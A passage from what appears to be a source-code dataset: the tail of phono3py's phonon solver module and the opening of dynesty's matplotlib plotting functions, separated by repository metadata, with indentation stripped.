# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of the phonopy project nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy as np
def run_phonon_solver_c(dm,
frequencies,
eigenvectors,
phonon_done,
grid_points,
grid_address,
mesh,
frequency_conversion_factor,
nac_q_direction, # in reduced coordinates
lapack_zheev_uplo,
verbose=False):
import phono3py._phono3py as phono3c
(svecs,
multiplicity,
masses,
rec_lattice, # column vectors
positions,
born,
nac_factor,
dielectric) = _extract_params(dm)
if dm.is_nac() and dm.nac_method == 'gonze':
gonze_nac_dataset = dm.Gonze_nac_dataset
if gonze_nac_dataset[0] is None:
dm.make_Gonze_nac_dataset()
gonze_nac_dataset = dm.Gonze_nac_dataset
(gonze_fc, # fc where the dipole-diple contribution is removed.
dd_q0, # second term of dipole-dipole expression.
G_cutoff, # Cutoff radius in reciprocal space. This will not be used.
G_list, # List of G points where d-d interactions are integrated.
Lambda) = gonze_nac_dataset # Convergence parameter
fc = gonze_fc
else:
positions = None
dd_q0 = None
G_list = None
Lambda = 0
fc = dm.force_constants
assert grid_points.dtype == 'uintp'
assert grid_points.flags.c_contiguous
fc_p2s, fc_s2p = _get_fc_elements_mapping(dm, fc)
phono3c.phonons_at_gridpoints(
frequencies,
eigenvectors,
phonon_done,
grid_points,
grid_address,
np.array(mesh, dtype='intc'),
fc,
svecs,
multiplicity,
positions,
masses,
fc_p2s,
fc_s2p,
frequency_conversion_factor,
born,
dielectric,
rec_lattice,
nac_q_direction,
nac_factor,
dd_q0,
G_list,
Lambda,
lapack_zheev_uplo)
def run_phonon_solver_py(grid_point,
phonon_done,
frequencies,
eigenvectors,
grid_address,
mesh,
dynamical_matrix,
frequency_conversion_factor,
lapack_zheev_uplo):
gp = grid_point
if phonon_done[gp] == 0:
phonon_done[gp] = 1
q = grid_address[gp].astype('double') / mesh
dynamical_matrix.run(q)
dm = dynamical_matrix.dynamical_matrix
eigvals, eigvecs = np.linalg.eigh(dm, UPLO=lapack_zheev_uplo)
eigvals = eigvals.real
frequencies[gp] = (np.sqrt(np.abs(eigvals)) * np.sign(eigvals)
* frequency_conversion_factor)
eigenvectors[gp] = eigvecs
def _extract_params(dm):
svecs, multiplicity = dm.primitive.get_smallest_vectors()
masses = np.array(dm.primitive.masses, dtype='double')
rec_lattice = np.array(np.linalg.inv(dm.primitive.cell),
dtype='double', order='C')
positions = np.array(dm.primitive.positions, dtype='double', order='C')
if dm.is_nac():
born = dm.born
nac_factor = dm.nac_factor
dielectric = dm.dielectric_constant
else:
born = None
nac_factor = 0
dielectric = None
return (svecs,
multiplicity,
masses,
rec_lattice,
positions,
born,
nac_factor,
dielectric)
def _get_fc_elements_mapping(dm, fc):
p2s_map = dm.primitive.p2s_map
s2p_map = dm.primitive.s2p_map
if fc.shape[0] == fc.shape[1]: # full fc
fc_p2s = p2s_map
fc_s2p = s2p_map
else: # compact fc
primitive = dm.primitive
p2p_map = primitive.p2p_map
s2pp_map = np.array([p2p_map[s2p_map[i]] for i in range(len(s2p_map))],
dtype='intc')
fc_p2s = np.arange(len(p2s_map), dtype='intc')
fc_s2p = s2pp_map
return fc_p2s, fc_s2p
|
atztogo/phono3py
|
phono3py/phonon/solver.py
|
Python
|
bsd-3-clause
| 5,731
|
[
"phonopy"
] |
699d48efcf93228d3aa7cb3b4841e4524a9122c9035c81dbcb29f80d7bde8451
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
A set of built-in plotting functions to help visualize ``dynesty`` nested
sampling :class:`~dynesty.results.Results`.
"""
import logging
import warnings
import numpy as np
import matplotlib.pyplot as pl
from matplotlib.ticker import MaxNLocator, NullLocator
from matplotlib.colors import LinearSegmentedColormap, colorConverter
from matplotlib.ticker import ScalarFormatter
from scipy.ndimage import gaussian_filter as norm_kde
from scipy.stats import gaussian_kde
from .utils import resample_equal, unitcheck
from .utils import quantile as _quantile
from .utils import get_random_generator, get_nonbounded
from . import bounding
str_type = str
float_type = float
int_type = int
__all__ = [
"runplot", "traceplot", "cornerpoints", "cornerplot", "boundplot",
"cornerbound", "_hist2d"
]
def _make_subplots(fig, nx, ny, xsize, ysize):
# Setting up default plot layout.
if fig is None:
fig, axes = pl.subplots(nx, ny, figsize=(xsize, ysize))
axes = np.asarray(axes).reshape(nx, ny)
else:
fig, axes = fig
try:
axes = np.asarray(axes).reshape(nx, ny)
except ValueError:
raise ValueError("Provided axes do not match the required shape")
return fig, axes
def runplot(results,
span=None,
logplot=False,
kde=True,
nkde=1000,
color='blue',
plot_kwargs=None,
label_kwargs=None,
lnz_error=True,
lnz_truth=None,
truth_color='red',
truth_kwargs=None,
max_x_ticks=8,
max_y_ticks=3,
use_math_text=True,
mark_final_live=True,
fig=None):
"""
Plot live points, ln(likelihood), ln(weight), and ln(evidence)
as a function of ln(prior volume).
Parameters
----------
results : :class:`~dynesty.results.Results` instance
A :class:`~dynesty.results.Results` instance from a nested
sampling run.
span : iterable with shape (4,), optional
A list where each element is either a length-2 tuple containing
lower and upper bounds *or* a float from `(0., 1.]` giving the
fraction below the maximum. If a fraction is provided,
the bounds are chosen to be equal-tailed. An example would be::
span = [(0., 10.), 0.001, 0.2, (5., 6.)]
Default is `(0., 1.05 * max(data))` for each element.
logplot : bool, optional
Whether to plot the evidence on a log scale. Default is `False`.
kde : bool, optional
Whether to use kernel density estimation to estimate and plot
the PDF of the importance weights as a function of log-volume
(as opposed to the importance weights themselves). Default is
`True`.
nkde : int, optional
The number of grid points used when plotting the kernel density
estimate. Default is `1000`.
color : str or iterable with shape (4,), optional
A `~matplotlib`-style color (either a single color or a different
value for each subplot) used when plotting the lines in each subplot.
Default is `'blue'`.
plot_kwargs : dict, optional
Extra keyword arguments that will be passed to `plot`.
label_kwargs : dict, optional
Extra keyword arguments that will be sent to the
`~matplotlib.axes.Axes.set_xlabel` and
`~matplotlib.axes.Axes.set_ylabel` methods.
lnz_error : bool, optional
Whether to plot the 1, 2, and 3-sigma approximate error bars
derived from the ln(evidence) error approximation over the course
of the run. Default is `True`.
lnz_truth : float, optional
A reference value for the evidence that will be overplotted on the
evidence subplot if provided.
truth_color : str or iterable with shape (ndim,), optional
A `~matplotlib`-style color used when plotting :data:`lnz_truth`.
Default is `'red'`.
truth_kwargs : dict, optional
Extra keyword arguments that will be used for plotting
:data:`lnz_truth`.
max_x_ticks : int, optional
Maximum number of ticks allowed for the x axis. Default is `8`.
max_y_ticks : int, optional
Maximum number of ticks allowed for the y axis. Default is `4`.
use_math_text : bool, optional
Whether the axis tick labels for very large/small exponents should be
displayed as powers of 10 rather than using `e`. Default is `False`.
mark_final_live : bool, optional
Whether to indicate the final addition of recycled live points
(if they were added to the resulting samples) using
a dashed vertical line. Default is `True`.
fig : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`), optional
If provided, overplot the run onto the provided figure.
Otherwise, by default an internal figure is generated.
Returns
-------
runplot : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`)
Output summary plot.
"""
# Initialize values.
if label_kwargs is None:
label_kwargs = dict()
if plot_kwargs is None:
plot_kwargs = dict()
if truth_kwargs is None:
truth_kwargs = dict()
# Set defaults.
plot_kwargs['linewidth'] = plot_kwargs.get('linewidth', 5)
plot_kwargs['alpha'] = plot_kwargs.get('alpha', 0.7)
truth_kwargs['linestyle'] = truth_kwargs.get('linestyle', 'solid')
truth_kwargs['linewidth'] = truth_kwargs.get('linewidth', 3)
# Extract results.
niter = results['niter'] # number of iterations
logvol = results['logvol'] # ln(prior volume)
logl = results['logl'] - max(results['logl']) # ln(normalized likelihood)
logwt = results['logwt'] - results['logz'][-1] # ln(importance weight)
logz = results['logz'] # ln(evidence)
logzerr = results['logzerr'] # error in ln(evidence)
logzerr[~np.isfinite(logzerr)] = 0.
nsamps = len(logwt) # number of samples
# Check whether the run was "static" or "dynamic".
try:
nlive = results['samples_n']
mark_final_live = False
except KeyError:
nlive = np.ones(niter) * results['nlive']
if nsamps - niter == results['nlive']:
nlive_final = np.arange(1, results['nlive'] + 1)[::-1]
nlive = np.append(nlive, nlive_final)
# Check if the final set of live points were added to the results.
if mark_final_live:
if nsamps - niter == results['nlive']:
live_idx = niter
else:
warnings.warn("The number of iterations and samples differ "
"by an amount that isn't the number of final "
"live points. `mark_final_live` has been disabled.")
mark_final_live = False
# Determine plotting bounds for each subplot.
data = [nlive, np.exp(logl), np.exp(logwt), np.exp(logz)]
if kde:
# Derive kernel density estimate.
wt_kde = gaussian_kde(resample_equal(-logvol, data[2])) # KDE
logvol_new = np.linspace(logvol[0], logvol[-1], nkde) # resample
data[2] = wt_kde.pdf(-logvol_new) # evaluate KDE PDF
if span is None:
span = [(0., 1.05 * max(d)) for d in data]
no_span = True
else:
no_span = False
span = list(span)
if len(span) != 4:
raise ValueError("More bounds provided in `span` than subplots!")
for i, _ in enumerate(span):
try:
ymin, ymax = span[i]
except:
span[i] = (max(data[i]) * span[i], max(data[i]))
if lnz_error and no_span:
if logplot:
zspan = (np.exp(logz[-1] - 1.3 * 3. * logzerr[-1]),
np.exp(logz[-1] + 1.3 * 3. * logzerr[-1]))
else:
zspan = (0., 1.05 * np.exp(logz[-1] + 3. * logzerr[-1]))
span[3] = zspan
# Setting up default plot layout.
fig, axes = _make_subplots(fig, 4, 1, 16, 16)
axes = axes.flatten()
xspan = [ax.get_xlim() for ax in axes]
yspan = [ax.get_ylim() for ax in axes]
# One exception: if the bounds are the plotting default `(0., 1.)`,
# overwrite them.
xspan = [t if t != (0., 1.) else (0., -min(logvol)) for t in xspan]
yspan = [t if t != (0., 1.) else (None, None) for t in yspan]
# Set up bounds for plotting.
for i in range(4):
if xspan[i][0] is None:
xmin = None
else:
xmin = min(0., xspan[i][0])
if xspan[i][1] is None:
xmax = -min(logvol)
else:
xmax = max(-min(logvol), xspan[i][1])
if yspan[i][0] is None:
ymin = None
else:
ymin = min(span[i][0], yspan[i][0])
if yspan[i][1] is None:
ymax = span[i][1]
else:
ymax = max(span[i][1], yspan[i][1])
axes[i].set_xlim([xmin, xmax])
axes[i].set_ylim([ymin, ymax])
# Plotting.
labels = [
'Live Points', 'Likelihood\n(normalized)', 'Importance\nWeight',
'Evidence'
]
if kde:
labels[2] += ' PDF'
for i, d in enumerate(data):
# Establish axes.
ax = axes[i]
# Set color(s)/colormap(s).
if isinstance(color, str_type):
c = color
else:
c = color[i]
# Setup axes.
if max_x_ticks == 0:
ax.xaxis.set_major_locator(NullLocator())
else:
ax.xaxis.set_major_locator(MaxNLocator(max_x_ticks))
if max_y_ticks == 0:
ax.yaxis.set_major_locator(NullLocator())
else:
ax.yaxis.set_major_locator(MaxNLocator(max_y_ticks))
# Label axes.
sf = ScalarFormatter(useMathText=use_math_text)
ax.yaxis.set_major_formatter(sf)
ax.set_xlabel(r"$-\ln X$", **label_kwargs)
ax.set_ylabel(labels[i], **label_kwargs)
# Plot run.
if logplot and i == 3:
ax.semilogy(-logvol, d, color=c, **plot_kwargs)
yspan = [ax.get_ylim() for _ax in axes]
elif kde and i == 2:
ax.plot(-logvol_new, d, color=c, **plot_kwargs)
else:
ax.plot(-logvol, d, color=c, **plot_kwargs)
if i == 3 and lnz_error:
[
ax.fill_between(-logvol,
np.exp(logz + s * logzerr),
np.exp(logz - s * logzerr),
color=c,
alpha=0.2) for s in range(1, 4)
]
# Mark addition of final live points.
if mark_final_live:
ax.axvline(-logvol[live_idx],
color=c,
ls="dashed",
lw=2,
**plot_kwargs)
if i == 0:
ax.axhline(live_idx, color=c, ls="dashed", lw=2, **plot_kwargs)
# Add truth value(s).
if i == 3 and lnz_truth is not None:
ax.axhline(np.exp(lnz_truth), color=truth_color, **truth_kwargs)
return fig, axes
def traceplot(results,
span=None,
quantiles=[0.025, 0.5, 0.975],
smooth=0.02,
thin=1,
dims=None,
post_color='blue',
post_kwargs=None,
kde=True,
nkde=1000,
trace_cmap='plasma',
trace_color=None,
trace_kwargs=None,
connect=False,
connect_highlight=10,
connect_color='red',
connect_kwargs=None,
max_n_ticks=5,
use_math_text=False,
labels=None,
label_kwargs=None,
show_titles=False,
title_quantiles=[0.025, 0.5, 0.975],
title_fmt=".2f",
title_kwargs=None,
truths=None,
truth_color='red',
truth_kwargs=None,
verbose=False,
fig=None):
"""
Plot traces and marginalized posteriors for each parameter.
Parameters
----------
results : :class:`~dynesty.results.Results` instance
A :class:`~dynesty.results.Results` instance from a nested
sampling run. **Compatible with results derived from**
`nestle <http://kylebarbary.com/nestle/>`_.
span : iterable with shape (ndim,), optional
A list where each element is either a length-2 tuple containing
lower and upper bounds or a float from `(0., 1.]` giving the
fraction of (weighted) samples to include. If a fraction is provided,
the bounds are chosen to be equal-tailed. An example would be::
span = [(0., 10.), 0.95, (5., 6.)]
Default is `0.999999426697` (5-sigma credible interval) for each
parameter.
quantiles : iterable, optional
A list of fractional quantiles to overplot on the 1-D marginalized
posteriors as vertical dashed lines. Default is `[0.025, 0.5, 0.975]`
(the 95%/2-sigma credible interval).
smooth : float or iterable with shape (ndim,), optional
The standard deviation (either a single value or a different value for
each subplot) for the Gaussian kernel used to smooth the 1-D
marginalized posteriors, expressed as a fraction of the span.
Default is `0.02` (2% smoothing). If an integer is provided instead,
this will instead default to a simple (weighted) histogram with
`bins=smooth`.
thin : int, optional
Thin the samples so that only each `thin`-th sample is plotted.
Default is `1` (no thinning).
dims : iterable of shape (ndim,), optional
The subset of dimensions that should be plotted. If not provided,
all dimensions will be shown.
post_color : str or iterable with shape (ndim,), optional
A `~matplotlib`-style color (either a single color or a different
value for each subplot) used when plotting the histograms.
Default is `'blue'`.
post_kwargs : dict, optional
Extra keyword arguments that will be used for plotting the
marginalized 1-D posteriors.
kde : bool, optional
Whether to use kernel density estimation to estimate and plot
the PDF of the importance weights as a function of log-volume
(as opposed to the importance weights themselves). Default is
`True`.
nkde : int, optional
The number of grid points used when plotting the kernel density
estimate. Default is `1000`.
trace_cmap : str or iterable with shape (ndim,), optional
A `~matplotlib`-style colormap (either a single colormap or a
different colormap for each subplot) used when plotting the traces,
where each point is colored according to its weight. Default is
`'plasma'`.
trace_color : str or iterable with shape (ndim,), optional
A `~matplotlib`-style color (either a single color or a
different color for each subplot) used when plotting the traces.
This overrides the `trace_cmap` option by giving all points
the same color. Default is `None` (not used).
trace_kwargs : dict, optional
Extra keyword arguments that will be used for plotting the traces.
connect : bool, optional
Whether to draw lines connecting the paths of unique particles.
Default is `False`.
connect_highlight : int or iterable, optional
If `connect=True`, highlights the paths of a specific set of
particles. If an integer is passed, :data:`connect_highlight`
random particle paths will be highlighted. If an iterable is passed,
then the particle paths corresponding to the provided indices
will be highlighted.
connect_color : str, optional
The color of the highlighted particle paths. Default is `'red'`.
connect_kwargs : dict, optional
Extra keyword arguments used for plotting particle paths.
max_n_ticks : int, optional
Maximum number of ticks allowed. Default is `5`.
use_math_text : bool, optional
Whether the axis tick labels for very large/small exponents should be
displayed as powers of 10 rather than using `e`. Default is `False`.
labels : iterable with shape (ndim,), optional
A list of names for each parameter. If not provided, the default name
used when plotting will follow :math:`x_i` style.
label_kwargs : dict, optional
Extra keyword arguments that will be sent to the
`~matplotlib.axes.Axes.set_xlabel` and
`~matplotlib.axes.Axes.set_ylabel` methods.
show_titles : bool, optional
Whether to display a title above each 1-D marginalized posterior
showing the 0.5 quantile along with the upper/lower bounds associated
with the 0.025 and 0.975 (95%/2-sigma credible interval) quantiles.
Default is `False`.
title_quantiles : iterable, optional
A list of fractional quantiles to use in the title. Default is
`[0.025, 0.5, 0.975]` (median plus 95%/2-sigma credible interval).
title_fmt : str, optional
The format string for the quantiles provided in the title. Default is
`'.2f'`.
title_kwargs : dict, optional
Extra keyword arguments that will be sent to the
`~matplotlib.axes.Axes.set_title` command.
truths : iterable with shape (ndim,), optional
A list of reference values that will be overplotted on the traces and
marginalized 1-D posteriors as solid horizontal/vertical lines.
Individual values can be exempt using `None`. Default is `None`.
truth_color : str or iterable with shape (ndim,), optional
A `~matplotlib`-style color (either a single color or a different
value for each subplot) used when plotting `truths`.
Default is `'red'`.
truth_kwargs : dict, optional
Extra keyword arguments that will be used for plotting the vertical
and horizontal lines with `truths`.
verbose : bool, optional
Whether to print the values of the computed quantiles associated with
each parameter. Default is `False`.
fig : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`), optional
If provided, overplot the traces and marginalized 1-D posteriors
onto the provided figure. Otherwise, by default an
internal figure is generated.
Returns
-------
traceplot : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`)
Output trace plot.
"""
# Initialize values.
if title_kwargs is None:
title_kwargs = dict()
if label_kwargs is None:
label_kwargs = dict()
if trace_kwargs is None:
trace_kwargs = dict()
if connect_kwargs is None:
connect_kwargs = dict()
if post_kwargs is None:
post_kwargs = dict()
if truth_kwargs is None:
truth_kwargs = dict()
# Set defaults.
connect_kwargs['alpha'] = connect_kwargs.get('alpha', 0.7)
post_kwargs['alpha'] = post_kwargs.get('alpha', 0.6)
trace_kwargs['s'] = trace_kwargs.get('s', 3)
trace_kwargs['edgecolor'] = trace_kwargs.get('edgecolor', None)
trace_kwargs['edgecolors'] = trace_kwargs.get('edgecolors', None)
truth_kwargs['linestyle'] = truth_kwargs.get('linestyle', 'solid')
truth_kwargs['linewidth'] = truth_kwargs.get('linewidth', 2)
rstate = get_random_generator()
# Extract weighted samples.
samples = results['samples']
logvol = results['logvol']
try:
weights = np.exp(results['logwt'] - results['logz'][-1])
except KeyError:
weights = results['weights']
if kde:
# Derive kernel density estimate.
wt_kde = gaussian_kde(resample_equal(-logvol, weights)) # KDE
logvol_grid = np.linspace(logvol[0], logvol[-1], nkde) # resample
wt_grid = wt_kde.pdf(-logvol_grid) # evaluate KDE PDF
wts = np.interp(-logvol, -logvol_grid, wt_grid) # interpolate
else:
wts = weights
# Deal with 1D results. A number of extra catches are also here
# in case users are trying to plot other results besides the `Results`
# instance generated by `dynesty`.
samples = np.atleast_1d(samples)
if len(samples.shape) == 1:
samples = np.atleast_2d(samples)
else:
assert len(samples.shape) == 2, "Samples must be 1- or 2-D."
samples = samples.T
assert samples.shape[0] <= samples.shape[1], "There are more " \
"dimensions than samples!"
# Slice samples based on provided `dims`.
if dims is not None:
samples = samples[dims]
ndim, nsamps = samples.shape
# Check weights.
if weights.ndim != 1:
raise ValueError("Weights must be 1-D.")
if nsamps != weights.shape[0]:
raise ValueError("The number of weights and samples disagree!")
# Check ln(volume).
if logvol.ndim != 1:
raise ValueError("Ln(volume)'s must be 1-D.")
if nsamps != logvol.shape[0]:
raise ValueError("The number of ln(volume)'s and samples disagree!")
# Check sample IDs.
if connect:
if 'samples_id' in results.keys():
samples_id = results['samples_id']
uid = np.unique(samples_id)
else:
raise ValueError("Sample IDs are not defined!")
try:
ids = connect_highlight[0]
ids = connect_highlight
except:
ids = rstate.choice(uid, size=connect_highlight, replace=False)
# Determine plotting bounds for marginalized 1-D posteriors.
if span is None:
span = [0.999999426697 for i in range(ndim)]
span = list(span)
if len(span) != ndim:
raise ValueError("Dimension mismatch between samples and span.")
for i, _ in enumerate(span):
try:
xmin, xmax = span[i]
except:
q = [0.5 - 0.5 * span[i], 0.5 + 0.5 * span[i]]
span[i] = _quantile(samples[i], q, weights=weights)
# Setting up labels.
if labels is None:
labels = [r"$x_{" + str(i + 1) + "}$" for i in range(ndim)]
# Setting up smoothing.
if (isinstance(smooth, int_type) or isinstance(smooth, float_type)):
smooth = [smooth for i in range(ndim)]
# Setting up default plot layout.
fig, axes = _make_subplots(fig, ndim, 2, 12, 3 * ndim)
# Plotting.
for i, x in enumerate(samples):
# Plot trace.
# Establish axes.
if np.shape(samples)[0] == 1:
ax = axes[1]
else:
ax = axes[i, 0]
# Set color(s)/colormap(s).
if trace_color is not None:
if isinstance(trace_color, str_type):
color = trace_color
else:
color = trace_color[i]
else:
color = wts[::thin]
if isinstance(trace_cmap, str_type):
cmap = trace_cmap
else:
cmap = trace_cmap[i]
# Setup axes.
ax.set_xlim([0., -min(logvol)])
ax.set_ylim([min(x), max(x)])
if max_n_ticks == 0:
ax.xaxis.set_major_locator(NullLocator())
ax.yaxis.set_major_locator(NullLocator())
else:
ax.xaxis.set_major_locator(MaxNLocator(max_n_ticks))
ax.yaxis.set_major_locator(MaxNLocator(max_n_ticks))
# Label axes.
sf = ScalarFormatter(useMathText=use_math_text)
ax.yaxis.set_major_formatter(sf)
ax.set_xlabel(r"$-\ln X$", **label_kwargs)
ax.set_ylabel(labels[i], **label_kwargs)
# Generate scatter plot.
ax.scatter(-logvol[::thin],
x[::thin],
c=color,
cmap=cmap,
**trace_kwargs)
if connect:
# Add lines highlighting specific particle paths.
for j in ids:
sel = (samples_id[::thin] == j)
ax.plot(-logvol[::thin][sel],
x[::thin][sel],
color=connect_color,
**connect_kwargs)
# Add truth value(s).
if truths is not None and truths[i] is not None:
try:
[
ax.axhline(t, color=truth_color, **truth_kwargs)
for t in truths[i]
]
except:
ax.axhline(truths[i], color=truth_color, **truth_kwargs)
# Plot marginalized 1-D posterior.
# Establish axes.
if np.shape(samples)[0] == 1:
ax = axes[0]
else:
ax = axes[i, 1]
# Set color(s).
if isinstance(post_color, str_type):
color = post_color
else:
color = post_color[i]
# Setup axes
ax.set_xlim(span[i])
if max_n_ticks == 0:
ax.xaxis.set_major_locator(NullLocator())
ax.yaxis.set_major_locator(NullLocator())
else:
ax.xaxis.set_major_locator(MaxNLocator(max_n_ticks))
ax.yaxis.set_major_locator(NullLocator())
# Label axes.
sf = ScalarFormatter(useMathText=use_math_text)
ax.xaxis.set_major_formatter(sf)
ax.set_xlabel(labels[i], **label_kwargs)
# Generate distribution.
s = smooth[i]
if isinstance(s, int_type):
# If `s` is an integer, plot a weighted histogram with
# `s` bins within the provided bounds.
n, b, _ = ax.hist(x,
bins=s,
weights=weights,
color=color,
range=np.sort(span[i]),
**post_kwargs)
x0 = np.array(list(zip(b[:-1], b[1:]))).flatten()
y0 = np.array(list(zip(n, n))).flatten()
else:
# If `s` is a float, oversample the data relative to the
# smoothing filter by a factor of 10, then use a Gaussian
# filter to smooth the results.
bins = int(round(10. / s))
n, b = np.histogram(x,
bins=bins,
weights=weights,
range=np.sort(span[i]))
n = norm_kde(n, 10.)
x0 = 0.5 * (b[1:] + b[:-1])
y0 = n
ax.fill_between(x0, y0, color=color, **post_kwargs)
ax.set_ylim([0., max(y0) * 1.05])
# Plot quantiles.
if quantiles is not None and len(quantiles) > 0:
qs = _quantile(x, quantiles, weights=weights)
for q in qs:
ax.axvline(q, lw=2, ls="dashed", color=color)
if verbose:
print("Quantiles:")
print(labels[i], [blob for blob in zip(quantiles, qs)])
# Add truth value(s).
if truths is not None and truths[i] is not None:
try:
[
ax.axvline(t, color=truth_color, **truth_kwargs)
for t in truths[i]
]
except:
ax.axvline(truths[i], color=truth_color, **truth_kwargs)
# Set titles.
if show_titles:
title = None
if title_fmt is not None:
ql, qm, qh = _quantile(x, title_quantiles, weights=weights)
q_minus, q_plus = qm - ql, qh - qm
fmt = "{{0:{0}}}".format(title_fmt).format
title = r"${{{0}}}_{{-{1}}}^{{+{2}}}$"
title = title.format(fmt(qm), fmt(q_minus), fmt(q_plus))
title = "{0} = {1}".format(labels[i], title)
ax.set_title(title, **title_kwargs)
return fig, axes
def cornerpoints(results,
dims=None,
thin=1,
span=None,
cmap='plasma',
color=None,
kde=True,
nkde=1000,
plot_kwargs=None,
labels=None,
label_kwargs=None,
truths=None,
truth_color='red',
truth_kwargs=None,
max_n_ticks=5,
use_math_text=False,
fig=None):
"""
Generate a (sub-)corner plot of (weighted) samples.
Parameters
----------
results : :class:`~dynesty.results.Results` instance
A :class:`~dynesty.results.Results` instance from a nested
sampling run. **Compatible with results derived from**
`nestle <http://kylebarbary.com/nestle/>`_.
dims : iterable of shape (ndim,), optional
The subset of dimensions that should be plotted. If not provided,
all dimensions will be shown.
thin : int, optional
Thin the samples so that only each `thin`-th sample is plotted.
Default is `1` (no thinning).
span : iterable with shape (ndim,), optional
A list where each element is either a length-2 tuple containing
lower and upper bounds or a float from `(0., 1.]` giving the
fraction of (weighted) samples to include. If a fraction is provided,
the bounds are chosen to be equal-tailed. An example would be::
span = [(0., 10.), 0.95, (5., 6.)]
Default is `1.` for all parameters (no bound).
cmap : str, optional
A `~matplotlib`-style colormap used when plotting the points,
where each point is colored according to its weight. Default is
`'plasma'`.
color : str, optional
A `~matplotlib`-style color used when plotting the points.
This overrides the `cmap` option by giving all points
the same color. Default is `None` (not used).
kde : bool, optional
Whether to use kernel density estimation to estimate and plot
the PDF of the importance weights as a function of log-volume
(as opposed to the importance weights themselves). Default is
`True`.
nkde : int, optional
The number of grid points used when plotting the kernel density
estimate. Default is `1000`.
plot_kwargs : dict, optional
Extra keyword arguments that will be used for plotting the points.
labels : iterable with shape (ndim,), optional
A list of names for each parameter. If not provided, the default name
used when plotting will follow :math:`x_i` style.
label_kwargs : dict, optional
Extra keyword arguments that will be sent to the
`~matplotlib.axes.Axes.set_xlabel` and
`~matplotlib.axes.Axes.set_ylabel` methods.
truths : iterable with shape (ndim,), optional
A list of reference values that will be overplotted on the traces and
marginalized 1-D posteriors as solid horizontal/vertical lines.
Individual values can be exempt using `None`. Default is `None`.
truth_color : str or iterable with shape (ndim,), optional
A `~matplotlib`-style color (either a single color or a different
value for each subplot) used when plotting `truths`.
Default is `'red'`.
truth_kwargs : dict, optional
Extra keyword arguments that will be used for plotting the vertical
and horizontal lines with `truths`.
max_n_ticks : int, optional
Maximum number of ticks allowed. Default is `5`.
use_math_text : bool, optional
Whether the axis tick labels for very large/small exponents should be
displayed as powers of 10 rather than using `e`. Default is `False`.
fig : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`), optional
If provided, overplot the points onto the provided figure object.
Otherwise, by default an internal figure is generated.
Returns
-------
cornerpoints : (`~matplotlib.figure.Figure`, `~matplotlib.axes.Axes`)
Output (sub-)corner plot of (weighted) samples.
"""
# Initialize values.
if truth_kwargs is None:
truth_kwargs = dict()
if label_kwargs is None:
label_kwargs = dict()
if plot_kwargs is None:
plot_kwargs = dict()
# Set defaults.
plot_kwargs['s'] = plot_kwargs.get('s', 1)
plot_kwargs['edgecolor'] = plot_kwargs.get('edgecolor', None)
plot_kwargs['edgecolors'] = plot_kwargs.get('edgecolors', None)
truth_kwargs['linestyle'] = truth_kwargs.get('linestyle', 'solid')
truth_kwargs['linewidth'] = truth_kwargs.get('linewidth', 2)
truth_kwargs['alpha'] = truth_kwargs.get('alpha', 0.7)
# Extract weighted samples.
samples = results['samples']
logvol = results['logvol']
try:
weights = np.exp(results['logwt'] - results['logz'][-1])
except:
weights = results['weights']
if kde:
# Derive kernel density estimate.
wt_kde = gaussian_kde(resample_equal(-logvol, weights)) # KDE
logvol_grid = np.linspace(logvol[0], logvol[-1], nkde) # resample
wt_grid = wt_kde.pdf(-logvol_grid) # evaluate KDE PDF
weights = np.interp(-logvol, -logvol_grid, wt_grid) # interpolate
# Deal with 1D results. A number of extra catches are also here
# in case users are trying to plot other results besides the `Results`
# instance generated by `dynesty`.
samples = np.atleast_1d(samples)
if len(samples.shape) == 1:
samples = np.atleast_2d(samples)
else:
assert len(samples.shape) == 2, "Samples must be 1- or 2-D."
samples = samples.T
assert samples.shape[0] <= samples.shape[1], "There are more " \
"dimensions than samples!"
# Slice samples based on provided `dims`.
if dims is not None:
samples = samples[dims]
ndim, nsamps = samples.shape
# Check weights.
if weights.ndim != 1:
raise ValueError("Weights must be 1-D.")
if nsamps != weights.shape[0]:
raise ValueError("The number of weights and samples disagree!")
# Determine plotting bounds.
if span is not None:
if len(span) != ndim:
raise ValueError("Dimension mismatch between samples and span.")
for i, _ in enumerate(span):
try:
xmin, xmax = span[i]
except:
q = [0.5 - 0.5 * span[i], 0.5 + 0.5 * span[i]]
span[i] = _quantile(samples[i], q, weights=weights)
# Set labels
if labels is None:
labels = [r"$x_{" + str(i + 1) + "}$" for i in range(ndim)]
# Set colormap.
if color is None:
color = weights
# Setup axis layout (from `corner.py`).
factor = 2.0 # size of side of one panel
lbdim = 0.5 * factor # size of left/bottom margin
trdim = 0.2 * factor # size of top/right margin
whspace = 0.05 # size of width/height margin
plotdim = factor * (ndim - 1.) + factor * (ndim - 2.) * whspace
dim = lbdim + plotdim + trdim # total size
# Initialize figure.
fig, axes = _make_subplots(fig, ndim - 1, ndim - 1, dim, dim)
# Format figure.
lb = lbdim / dim
tr = (lbdim + plotdim) / dim
